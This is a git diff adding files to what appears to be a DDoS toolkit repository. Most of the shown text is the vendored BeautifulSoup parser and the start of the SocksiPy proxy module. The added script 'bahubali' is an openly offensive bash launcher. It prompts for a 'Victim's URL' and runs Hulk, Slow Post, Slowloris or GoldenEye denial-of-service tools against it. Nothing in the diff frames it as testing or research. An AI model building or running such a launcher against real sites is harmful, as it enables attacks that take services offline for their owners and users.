+ self.currentTag.contents.append(o)
+
+
+ def _popToTag(self, name, inclusivePop=True):
+ """Pops the tag stack up to and including the most recent
+ instance of the given tag. If inclusivePop is false, pops the tag
+ stack up to but *not* including the most recent instqance of
+ the given tag."""
+ #print "Popping to %s" % name
+ if name == self.ROOT_TAG_NAME:
+ return
+
+ numPops = 0
+ mostRecentTag = None
+ for i in range(len(self.tagStack)-1, 0, -1):
+ if name == self.tagStack[i].name:
+ numPops = len(self.tagStack)-i
+ break
+ if not inclusivePop:
+ numPops = numPops - 1
+
+ for i in range(0, numPops):
+ mostRecentTag = self.popTag()
+ return mostRecentTag
+
+ def _smartPop(self, name):
+
+ """We need to pop up to the previous tag of this type, unless
+ one of this tag's nesting reset triggers comes between this
+ tag and the previous tag of this type, OR unless this tag is a
+ generic nesting trigger and another generic nesting trigger
+ comes between this tag and the previous tag of this type.
+
+ Examples:
+ <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'.
+ <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'.
+ <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'.
+
+ <li><ul><li> *<li>* should pop to 'ul', not the first 'li'.
+ <tr><table><tr> *<tr>* should pop to 'table', not the first 'tr'
+ <td><tr><td> *<td>* should pop to 'tr', not the first 'td'
+ """
+
+ nestingResetTriggers = self.NESTABLE_TAGS.get(name)
+ isNestable = nestingResetTriggers != None
+ isResetNesting = self.RESET_NESTING_TAGS.has_key(name)
+ popTo = None
+ inclusive = True
+ for i in range(len(self.tagStack)-1, 0, -1):
+ p = self.tagStack[i]
+ if (not p or p.name == name) and not isNestable:
+ #Non-nestable tags get popped to the top or to their
+ #last occurance.
+ popTo = name
+ break
+ if (nestingResetTriggers != None
+ and p.name in nestingResetTriggers) \
+ or (nestingResetTriggers == None and isResetNesting
+ and self.RESET_NESTING_TAGS.has_key(p.name)):
+
+ #If we encounter one of the nesting reset triggers
+ #peculiar to this tag, or we encounter another tag
+ #that causes nesting to reset, pop up to but not
+ #including that tag.
+ popTo = p.name
+ inclusive = False
+ break
+ p = p.parent
+ if popTo:
+ self._popToTag(popTo, inclusive)
+
+ def unknown_starttag(self, name, attrs, selfClosing=0):
+ #print "Start tag %s: %s" % (name, attrs)
+ if self.quoteStack:
+ #This is not a real tag.
+ #print "<%s> is not real!" % name
+ attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs))
+ self.handle_data('<%s%s>' % (name, attrs))
+ return
+ self.endData()
+
+ if not self.isSelfClosingTag(name) and not selfClosing:
+ self._smartPop(name)
+
+ if self.parseOnlyThese and len(self.tagStack) <= 1 \
+ and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)):
+ return
+
+ tag = Tag(self, name, attrs, self.currentTag, self.previous)
+ if self.previous:
+ self.previous.next = tag
+ self.previous = tag
+ self.pushTag(tag)
+ if selfClosing or self.isSelfClosingTag(name):
+ self.popTag()
+ if name in self.QUOTE_TAGS:
+ #print "Beginning quote (%s)" % name
+ self.quoteStack.append(name)
+ self.literal = 1
+ return tag
+
+ def unknown_endtag(self, name):
+ #print "End tag %s" % name
+ if self.quoteStack and self.quoteStack[-1] != name:
+ #This is not a real end tag.
+ #print "</%s> is not real!" % name
+ self.handle_data('</%s>' % name)
+ return
+ self.endData()
+ self._popToTag(name)
+ if self.quoteStack and self.quoteStack[-1] == name:
+ self.quoteStack.pop()
+ self.literal = (len(self.quoteStack) > 0)
+
+ def handle_data(self, data):
+ self.currentData.append(data)
+
+ def extractCharsetFromMeta(self, attrs):
+ self.unknown_starttag('meta', attrs)
+
+
+class BeautifulSoup(BeautifulStoneSoup):
+
+ """This parser knows the following facts about HTML:
+
+ * Some tags have no closing tag and should be interpreted as being
+ closed as soon as they are encountered.
+
+ * The text inside some tags (ie. 'script') may contain tags which
+ are not really part of the document and which should be parsed
+ as text, not tags. If you want to parse the text as tags, you can
+ always fetch it and parse it explicitly.
+
+ * Tag nesting rules:
+
+ Most tags can't be nested at all. For instance, the occurance of
+ a <p> tag should implicitly close the previous <p> tag.
+
+ <p>Para1<p>Para2
+ should be transformed into:
+ <p>Para1</p><p>Para2
+
+ Some tags can be nested arbitrarily. For instance, the occurance
+ of a <blockquote> tag should _not_ implicitly close the previous
+ <blockquote> tag.
+
+ Alice said: <blockquote>Bob said: <blockquote>Blah
+ should NOT be transformed into:
+ Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah
+
+ Some tags can be nested, but the nesting is reset by the
+ interposition of other tags. For instance, a <tr> tag should
+ implicitly close the previous <tr> tag within the same <table>,
+ but not close a <tr> tag in another table.
+
+ <table><tr>Blah<tr>Blah
+ should be transformed into:
+ <table><tr>Blah</tr><tr>Blah
+ but,
+ <tr>Blah<table><tr>Blah
+ should NOT be transformed into
+ <tr>Blah<table></tr><tr>Blah
+
+ Differing assumptions about tag nesting rules are a major source
+ of problems with the BeautifulSoup class. If BeautifulSoup is not
+ treating as nestable a tag your page author treats as nestable,
+ try ICantBelieveItsBeautifulSoup, MinimalSoup, or
+ BeautifulStoneSoup before writing your own subclass."""
+
+ def __init__(self, *args, **kwargs):
+ if not kwargs.has_key('smartQuotesTo'):
+ kwargs['smartQuotesTo'] = self.HTML_ENTITIES
+ kwargs['isHTML'] = True
+ BeautifulStoneSoup.__init__(self, *args, **kwargs)
+
+ SELF_CLOSING_TAGS = buildTagMap(None,
+ ['br' , 'hr', 'input', 'img', 'meta',
+ 'spacer', 'link', 'frame', 'base'])
+
+ PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea'])
+
+ QUOTE_TAGS = {'script' : None, 'textarea' : None}
+
+ #According to the HTML standard, each of these inline tags can
+ #contain another tag of the same type. Furthermore, it's common
+ #to actually use these tags this way.
+ NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup',
+ 'center']
+
+ #According to the HTML standard, these block tags can contain
+ #another tag of the same type. Furthermore, it's common
+ #to actually use these tags this way.
+ NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del']
+
+ #Lists can contain other lists, but there are restrictions.
+ NESTABLE_LIST_TAGS = { 'ol' : [],
+ 'ul' : [],
+ 'li' : ['ul', 'ol'],
+ 'dl' : [],
+ 'dd' : ['dl'],
+ 'dt' : ['dl'] }
+
+ #Tables can contain other tables, but there are restrictions.
+ NESTABLE_TABLE_TAGS = {'table' : [],
+ 'tr' : ['table', 'tbody', 'tfoot', 'thead'],
+ 'td' : ['tr'],
+ 'th' : ['tr'],
+ 'thead' : ['table'],
+ 'tbody' : ['table'],
+ 'tfoot' : ['table'],
+ }
+
+ NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre']
+
+ #If one of these tags is encountered, all tags up to the next tag of
+ #this type are popped.
+ RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript',
+ NON_NESTABLE_BLOCK_TAGS,
+ NESTABLE_LIST_TAGS,
+ NESTABLE_TABLE_TAGS)
+
+ NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS,
+ NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS)
+
+ # Used to detect the charset in a META tag; see start_meta
+ CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M)
+
+ def extractCharsetFromMeta(self, attrs):
+ """Beautiful Soup can detect a charset included in a META tag,
+ try to convert the document to that charset, and re-parse the
+ document from the beginning."""
+ httpEquiv = None
+ contentType = None
+ contentTypeIndex = None
+ tagNeedsEncodingSubstitution = False
+
+ for i in range(0, len(attrs)):
+ key, value = attrs[i]
+ key = key.lower()
+ if key == 'http-equiv':
+ httpEquiv = value
+ elif key == 'content':
+ contentType = value
+ contentTypeIndex = i
+
+ if httpEquiv and contentType: # It's an interesting meta tag.
+ match = self.CHARSET_RE.search(contentType)
+ if match:
+ if (self.declaredHTMLEncoding is not None or
+ self.originalEncoding == self.fromEncoding):
+ # An HTML encoding was sniffed while converting
+ # the document to Unicode, or an HTML encoding was
+ # sniffed during a previous pass through the
+ # document, or an encoding was specified
+ # explicitly and it worked. Rewrite the meta tag.
+ def rewrite(match):
+ return match.group(1) + "%SOUP-ENCODING%"
+ newAttr = self.CHARSET_RE.sub(rewrite, contentType)
+ attrs[contentTypeIndex] = (attrs[contentTypeIndex][0],
+ newAttr)
+ tagNeedsEncodingSubstitution = True
+ else:
+ # This is our first pass through the document.
+ # Go through it again with the encoding information.
+ newCharset = match.group(3)
+ if newCharset and newCharset != self.originalEncoding:
+ self.declaredHTMLEncoding = newCharset
+ self._feed(self.declaredHTMLEncoding)
+ raise StopParsing
+ pass
+ tag = self.unknown_starttag("meta", attrs)
+ if tag and tagNeedsEncodingSubstitution:
+ tag.containsSubstitutions = True
+
+
+class StopParsing(Exception):
+ pass
+
+class ICantBelieveItsBeautifulSoup(BeautifulSoup):
+
+ """The BeautifulSoup class is oriented towards skipping over
+ common HTML errors like unclosed tags. However, sometimes it makes
+ errors of its own. For instance, consider this fragment:
+
+ <b>Foo<b>Bar</b></b>
+
+ This is perfectly valid (if bizarre) HTML. However, the
+ BeautifulSoup class will implicitly close the first b tag when it
+ encounters the second 'b'. It will think the author wrote
+ "<b>Foo<b>Bar", and didn't close the first 'b' tag, because
+ there's no real-world reason to bold something that's already
+ bold. When it encounters '</b></b>' it will close two more 'b'
+ tags, for a grand total of three tags closed instead of two. This
+ can throw off the rest of your document structure. The same is
+ true of a number of other tags, listed below.
+
+ It's much more common for someone to forget to close a 'b' tag
+ than to actually use nested 'b' tags, and the BeautifulSoup class
+ handles the common case. This class handles the not-co-common
+ case: where you can't believe someone wrote what they did, but
+ it's valid HTML and BeautifulSoup screwed up by assuming it
+ wouldn't be."""
+
+ I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \
+ ['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong',
+ 'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b',
+ 'big']
+
+ I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript']
+
+ NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS,
+ I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS,
+ I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS)
+
+class MinimalSoup(BeautifulSoup):
+ """The MinimalSoup class is for parsing HTML that contains
+ pathologically bad markup. It makes no assumptions about tag
+ nesting, but it does know which tags are self-closing, that
+ <script> tags contain Javascript and should not be parsed, that
+ META tags may contain encoding information, and so on.
+
+ This also makes it better for subclassing than BeautifulStoneSoup
+ or BeautifulSoup."""
+
+ RESET_NESTING_TAGS = buildTagMap('noscript')
+ NESTABLE_TAGS = {}
+
+class BeautifulSOAP(BeautifulStoneSoup):
+ """This class will push a tag with only a single string child into
+ the tag's parent as an attribute. The attribute's name is the tag
+ name, and the value is the string child. An example should give
+ the flavor of the change:
+
+ <foo><bar>baz</bar></foo>
+ =>
+ <foo bar="baz"><bar>baz</bar></foo>
+
+ You can then access fooTag['bar'] instead of fooTag.barTag.string.
+
+ This is, of course, useful for scraping structures that tend to
+ use subelements instead of attributes, such as SOAP messages. Note
+ that it modifies its input, so don't print the modified version
+ out.
+
+ I'm not sure how many people really want to use this class; let me
+ know if you do. Mainly I like the name."""
+
+ def popTag(self):
+ if len(self.tagStack) > 1:
+ tag = self.tagStack[-1]
+ parent = self.tagStack[-2]
+ parent._getAttrMap()
+ if (isinstance(tag, Tag) and len(tag.contents) == 1 and
+ isinstance(tag.contents[0], NavigableString) and
+ not parent.attrMap.has_key(tag.name)):
+ parent[tag.name] = tag.contents[0]
+ BeautifulStoneSoup.popTag(self)
+
+#Enterprise class names! It has come to our attention that some people
+#think the names of the Beautiful Soup parser classes are too silly
+#and "unprofessional" for use in enterprise screen-scraping. We feel
+#your pain! For such-minded folk, the Beautiful Soup Consortium And
+#All-Night Kosher Bakery recommends renaming this file to
+#"RobustParser.py" (or, in cases of extreme enterprisiness,
+#"RobustParserBeanInterface.class") and using the following
+#enterprise-friendly class aliases:
+class RobustXMLParser(BeautifulStoneSoup):
+ pass
+class RobustHTMLParser(BeautifulSoup):
+ pass
+class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup):
+ pass
+class RobustInsanelyWackAssHTMLParser(MinimalSoup):
+ pass
+class SimplifyingSOAPParser(BeautifulSOAP):
+ pass
+
+######################################################
+#
+# Bonus library: Unicode, Dammit
+#
+# This class forces XML data into a standard format (usually to UTF-8
+# or Unicode). It is heavily based on code from Mark Pilgrim's
+# Universal Feed Parser. It does not rewrite the XML or HTML to
+# reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi
+# (XML) and BeautifulSoup.start_meta (HTML).
+
+# Autodetects character encodings.
+# Download from http://chardet.feedparser.org/
+try:
+ import chardet
+# import chardet.constants
+# chardet.constants._debug = 1
+except ImportError:
+ chardet = None
+
+# cjkcodecs and iconv_codec make Python know about more character encodings.
+# Both are available from http://cjkpython.i18n.org/
+# They're built in if you use Python 2.4.
+try:
+ import cjkcodecs.aliases
+except ImportError:
+ pass
+try:
+ import iconv_codec
+except ImportError:
+ pass
+
+class UnicodeDammit:
+ """A class for detecting the encoding of a *ML document and
+ converting it to a Unicode string. If the source encoding is
+ windows-1252, can replace MS smart quotes with their HTML or XML
+ equivalents."""
+
+ # This dictionary maps commonly seen values for "charset" in HTML
+ # meta tags to the corresponding Python codec names. It only covers
+ # values that aren't in Python's aliases and can't be determined
+ # by the heuristics in find_codec.
+ CHARSET_ALIASES = { "macintosh" : "mac-roman",
+ "x-sjis" : "shift-jis" }
+
+ def __init__(self, markup, overrideEncodings=[],
+ smartQuotesTo='xml', isHTML=False):
+ self.declaredHTMLEncoding = None
+ self.markup, documentEncoding, sniffedEncoding = \
+ self._detectEncoding(markup, isHTML)
+ self.smartQuotesTo = smartQuotesTo
+ self.triedEncodings = []
+ if markup == '' or isinstance(markup, unicode):
+ self.originalEncoding = None
+ self.unicode = unicode(markup)
+ return
+
+ u = None
+ for proposedEncoding in overrideEncodings:
+ u = self._convertFrom(proposedEncoding)
+ if u: break
+ if not u:
+ for proposedEncoding in (documentEncoding, sniffedEncoding):
+ u = self._convertFrom(proposedEncoding)
+ if u: break
+
+ # If no luck and we have auto-detection library, try that:
+ if not u and chardet and not isinstance(self.markup, unicode):
+ u = self._convertFrom(chardet.detect(self.markup)['encoding'])
+
+ # As a last resort, try utf-8 and windows-1252:
+ if not u:
+ for proposed_encoding in ("utf-8", "windows-1252"):
+ u = self._convertFrom(proposed_encoding)
+ if u: break
+
+ self.unicode = u
+ if not u: self.originalEncoding = None
+
+ def _subMSChar(self, match):
+ """Changes a MS smart quote character to an XML or HTML
+ entity."""
+ orig = match.group(1)
+ sub = self.MS_CHARS.get(orig)
+ if type(sub) == types.TupleType:
+ if self.smartQuotesTo == 'xml':
+ sub = '&#x'.encode() + sub[1].encode() + ';'.encode()
+ else:
+ sub = '&'.encode() + sub[0].encode() + ';'.encode()
+ else:
+ sub = sub.encode()
+ return sub
+
+ def _convertFrom(self, proposed):
+ proposed = self.find_codec(proposed)
+ if not proposed or proposed in self.triedEncodings:
+ return None
+ self.triedEncodings.append(proposed)
+ markup = self.markup
+
+ # Convert smart quotes to HTML if coming from an encoding
+ # that might have them.
+ if self.smartQuotesTo and proposed.lower() in("windows-1252",
+ "iso-8859-1",
+ "iso-8859-2"):
+ smart_quotes_re = "([\x80-\x9f])"
+ smart_quotes_compiled = re.compile(smart_quotes_re)
+ markup = smart_quotes_compiled.sub(self._subMSChar, markup)
+
+ try:
+ # print "Trying to convert document to %s" % proposed
+ u = self._toUnicode(markup, proposed)
+ self.markup = u
+ self.originalEncoding = proposed
+ except Exception, e:
+ # print "That didn't work!"
+ # print e
+ return None
+ #print "Correct encoding: %s" % proposed
+ return self.markup
+
+ def _toUnicode(self, data, encoding):
+ '''Given a string and its encoding, decodes the string into Unicode.
+ %encoding is a string recognized by encodings.aliases'''
+
+ # strip Byte Order Mark (if present)
+ if (len(data) >= 4) and (data[:2] == '\xfe\xff') \
+ and (data[2:4] != '\x00\x00'):
+ encoding = 'utf-16be'
+ data = data[2:]
+ elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \
+ and (data[2:4] != '\x00\x00'):
+ encoding = 'utf-16le'
+ data = data[2:]
+ elif data[:3] == '\xef\xbb\xbf':
+ encoding = 'utf-8'
+ data = data[3:]
+ elif data[:4] == '\x00\x00\xfe\xff':
+ encoding = 'utf-32be'
+ data = data[4:]
+ elif data[:4] == '\xff\xfe\x00\x00':
+ encoding = 'utf-32le'
+ data = data[4:]
+ newdata = unicode(data, encoding)
+ return newdata
+
+ def _detectEncoding(self, xml_data, isHTML=False):
+ """Given a document, tries to detect its XML encoding."""
+ xml_encoding = sniffed_xml_encoding = None
+ try:
+ if xml_data[:4] == '\x4c\x6f\xa7\x94':
+ # EBCDIC
+ xml_data = self._ebcdic_to_ascii(xml_data)
+ elif xml_data[:4] == '\x00\x3c\x00\x3f':
+ # UTF-16BE
+ sniffed_xml_encoding = 'utf-16be'
+ xml_data = unicode(xml_data, 'utf-16be').encode('utf-8')
+ elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \
+ and (xml_data[2:4] != '\x00\x00'):
+ # UTF-16BE with BOM
+ sniffed_xml_encoding = 'utf-16be'
+ xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8')
+ elif xml_data[:4] == '\x3c\x00\x3f\x00':
+ # UTF-16LE
+ sniffed_xml_encoding = 'utf-16le'
+ xml_data = unicode(xml_data, 'utf-16le').encode('utf-8')
+ elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \
+ (xml_data[2:4] != '\x00\x00'):
+ # UTF-16LE with BOM
+ sniffed_xml_encoding = 'utf-16le'
+ xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8')
+ elif xml_data[:4] == '\x00\x00\x00\x3c':
+ # UTF-32BE
+ sniffed_xml_encoding = 'utf-32be'
+ xml_data = unicode(xml_data, 'utf-32be').encode('utf-8')
+ elif xml_data[:4] == '\x3c\x00\x00\x00':
+ # UTF-32LE
+ sniffed_xml_encoding = 'utf-32le'
+ xml_data = unicode(xml_data, 'utf-32le').encode('utf-8')
+ elif xml_data[:4] == '\x00\x00\xfe\xff':
+ # UTF-32BE with BOM
+ sniffed_xml_encoding = 'utf-32be'
+ xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8')
+ elif xml_data[:4] == '\xff\xfe\x00\x00':
+ # UTF-32LE with BOM
+ sniffed_xml_encoding = 'utf-32le'
+ xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8')
+ elif xml_data[:3] == '\xef\xbb\xbf':
+ # UTF-8 with BOM
+ sniffed_xml_encoding = 'utf-8'
+ xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8')
+ else:
+ sniffed_xml_encoding = 'ascii'
+ pass
+ except:
+ xml_encoding_match = None
+ xml_encoding_re = '^<\?.*encoding=[\'"](.*?)[\'"].*\?>'.encode()
+ xml_encoding_match = re.compile(xml_encoding_re).match(xml_data)
+ if not xml_encoding_match and isHTML:
+ meta_re = '<\s*meta[^>]+charset=([^>]*?)[;\'">]'.encode()
+ regexp = re.compile(meta_re, re.I)
+ xml_encoding_match = regexp.search(xml_data)
+ if xml_encoding_match is not None:
+ xml_encoding = xml_encoding_match.groups()[0].decode(
+ 'ascii').lower()
+ if isHTML:
+ self.declaredHTMLEncoding = xml_encoding
+ if sniffed_xml_encoding and \
+ (xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode',
+ 'iso-10646-ucs-4', 'ucs-4', 'csucs4',
+ 'utf-16', 'utf-32', 'utf_16', 'utf_32',
+ 'utf16', 'u16')):
+ xml_encoding = sniffed_xml_encoding
+ return xml_data, xml_encoding, sniffed_xml_encoding
+
+
+ def find_codec(self, charset):
+ return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \
+ or (charset and self._codec(charset.replace("-", ""))) \
+ or (charset and self._codec(charset.replace("-", "_"))) \
+ or charset
+
+ def _codec(self, charset):
+ if not charset: return charset
+ codec = None
+ try:
+ codecs.lookup(charset)
+ codec = charset
+ except (LookupError, ValueError):
+ pass
+ return codec
+
+ EBCDIC_TO_ASCII_MAP = None
+ def _ebcdic_to_ascii(self, s):
+ c = self.__class__
+ if not c.EBCDIC_TO_ASCII_MAP:
+ emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15,
+ 16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31,
+ 128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7,
+ 144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26,
+ 32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33,
+ 38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94,
+ 45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63,
+ 186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34,
+ 195,97,98,99,100,101,102,103,104,105,196,197,198,199,200,
+ 201,202,106,107,108,109,110,111,112,113,114,203,204,205,
+ 206,207,208,209,126,115,116,117,118,119,120,121,122,210,
+ 211,212,213,214,215,216,217,218,219,220,221,222,223,224,
+ 225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72,
+ 73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81,
+ 82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89,
+ 90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57,
+ 250,251,252,253,254,255)
+ import string
+ c.EBCDIC_TO_ASCII_MAP = string.maketrans( \
+ ''.join(map(chr, range(256))), ''.join(map(chr, emap)))
+ return s.translate(c.EBCDIC_TO_ASCII_MAP)
+
+ MS_CHARS = { '\x80' : ('euro', '20AC'),
+ '\x81' : ' ',
+ '\x82' : ('sbquo', '201A'),
+ '\x83' : ('fnof', '192'),
+ '\x84' : ('bdquo', '201E'),
+ '\x85' : ('hellip', '2026'),
+ '\x86' : ('dagger', '2020'),
+ '\x87' : ('Dagger', '2021'),
+ '\x88' : ('circ', '2C6'),
+ '\x89' : ('permil', '2030'),
+ '\x8A' : ('Scaron', '160'),
+ '\x8B' : ('lsaquo', '2039'),
+ '\x8C' : ('OElig', '152'),
+ '\x8D' : '?',
+ '\x8E' : ('#x17D', '17D'),
+ '\x8F' : '?',
+ '\x90' : '?',
+ '\x91' : ('lsquo', '2018'),
+ '\x92' : ('rsquo', '2019'),
+ '\x93' : ('ldquo', '201C'),
+ '\x94' : ('rdquo', '201D'),
+ '\x95' : ('bull', '2022'),
+ '\x96' : ('ndash', '2013'),
+ '\x97' : ('mdash', '2014'),
+ '\x98' : ('tilde', '2DC'),
+ '\x99' : ('trade', '2122'),
+ '\x9a' : ('scaron', '161'),
+ '\x9b' : ('rsaquo', '203A'),
+ '\x9c' : ('oelig', '153'),
+ '\x9d' : '?',
+ '\x9e' : ('#x17E', '17E'),
+ '\x9f' : ('Yuml', ''),}
+
+#######################################################################
+
+
+#By default, act as an HTML pretty-printer.
+if __name__ == '__main__':
+ import sys
+ soup = BeautifulSoup(sys.stdin)
+ print soup.prettify()
diff --git a/src/BeautifulSoup.pyc b/src/BeautifulSoup.pyc
new file mode 100644
index 0000000..9f0acae
--- /dev/null
+++ b/src/BeautifulSoup.pyc
Binary files differ
diff --git a/src/bahubali b/src/bahubali
new file mode 100644
index 0000000..ed1b87d
--- /dev/null
+++ b/src/bahubali
@@ -0,0 +1,99 @@
+#!/bin/bash
+#set -x
+cat << "ASCII"
+
+
+ ____ _ _ _ _
+ | _ \ | | | | | (_)
+ | |_) | __ _| |__ _ _| |__ __ _| |_
+ | _ < / _` | '_ \| | | | '_ \ / _` | | |
+ | |_) | (_| | | | | |_| | |_) | (_| | | |
+ |____/ \__,_|_| |_|\__,_|_.__/ \__,_|_|_|
+
+
+
+
+ASCII
+echo "Enter the Victim's URL with http:/https:"
+read url
+
+while [[ ! $url =~ https?:// ]]; do
+ read -p "You have not used HTTP or HTTPS, Please Enter Again else the tools wont work. Enter Again : " url
+
+done
+#echo "Reaches Here"
+read F
+clear
+function menu() {
+echo "Victim's URL is $url"
+echo "Choose any option"
+echo "(1) Hulk"
+echo "(2) Slow Post DoS"
+echo "(3) SlowORis"
+echo "(4) GoldenEye"
+echo "(5) About Bahubali"
+echo "(6) Exit"
+read -p "Enter the option number : " option
+while [[ $option -le 0 || $option -ge 6 ]]; do
+ read -p "Invalid Input, Please Enter Again : " option
+done
+return $option
+}
+menu "$url" $option
+echo "Your selected option is $option"
+read -n1 -r -p "Press any key to continue..." key
+if [ $option -eq 1 ]; then
+clear
+echo "Press Enter to Begin Hulk Atack"
+read fun
+clear
+python hulk.py $url
+
+elif [ $option -eq 2 ]; then
+clear
+echo "Enter the no of threads eg 256"
+read threadst
+clear
+echo "enter the web server port eg 80"
+read portt
+clear
+echo "Press Enter to Begin Attack"
+read funt
+clear
+python 2.py -t $url -r $threadst -p $portt -T
+elif [ $option -eq 3 ]; then
+clear
+echo "May The Force Be With You"
+echo "Press Enter to Attack"
+read fun
+perl 3.pl -dns $url -options
+elif [ $option -eq 4 ]; then
+echo "007 Attack starting"
+echo "Under Heavy Testing would not work"
+echo "GoldenEye Attack initiated"
+read fun
+python goldeneye.py $url
+elif [ $option -eq 6 ]; then
+echo "GoodBye"
+exit
+elif [ $option -eq 5 ]; then
+clear
+echo "ONE TOOL TO RULE THEM ALL"
+cat << "A"
+
+
+ ____ _ _ _ _
+ | _ \ | | | | | (_)
+ | |_) | __ _| |__ _ _| |__ __ _| |_
+ | _ < / _` | '_ \| | | | '_ \ / _` | | |
+ | |_) | (_| | | | | |_| | |_) | (_| | | |
+ |____/ \__,_|_| |_|\__,_|_.__/ \__,_|_|_|
+
+
+
+
+A
+echo "Bahubali is a tool which allows you to execute any one of the multiple DDOS tools through one single tool"
+
+read about
+fi
diff --git a/src/socks.py b/src/socks.py
new file mode 100644
index 0000000..7cc1bc3
--- /dev/null
+++ b/src/socks.py
@@ -0,0 +1,387 @@
+"""SocksiPy - Python SOCKS module.
+Version 1.00
+
+Copyright 2006 Dan-Haim. All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification,
+are permitted provided that the following conditions are met:
+1. Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+3. Neither the name of Dan Haim nor the names of his contributors may be used
+ to endorse or promote products derived from this software without specific
+ prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED
+WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
+EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA
+OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
+LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE.
+
+
+This module provides a standard socket-like interface for Python
+for tunneling connections through SOCKS proxies.
+
+"""
+
+import socket
+import struct
+
+PROXY_TYPE_SOCKS4 = 1
+PROXY_TYPE_SOCKS5 = 2
+PROXY_TYPE_HTTP = 3
+
+_defaultproxy = None
+_orgsocket = socket.socket
+
+class ProxyError(Exception):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class GeneralProxyError(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class Socks5AuthError(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class Socks5Error(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class Socks4Error(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class HTTPError(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+_generalerrors = ("success",
+ "invalid data",
+ "not connected",
+ "not available",
+ "bad proxy type",
+ "bad input")
+
+_socks5errors = ("succeeded",
+ "general SOCKS server failure",
+ "connection not allowed by ruleset",
+ "Network unreachable",
+ "Host unreachable",
+ "Connection refused",
+ "TTL expired",
+ "Command not supported",
+ "Address type not supported",
+ "Unknown error")
+
+_socks5autherrors = ("succeeded",
+ "authentication is required",
+ "all offered authentication methods were rejected",
+ "unknown username or invalid password",
+ "unknown error")
+
+_socks4errors = ("request granted",
+ "request rejected or failed",
+ "request rejected because SOCKS server cannot connect to identd on the client",
+ "request rejected because the client program and identd report different user-ids",
+ "unknown error")
+
+def setdefaultproxy(proxytype=None,addr=None,port=None,rdns=True,username=None,password=None):
+ """setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
+ Sets a default proxy which all further socksocket objects will use,
+ unless explicitly changed.
+ """
+ global _defaultproxy
+ _defaultproxy = (proxytype,addr,port,rdns,username,password)
+
+class socksocket(socket.socket):
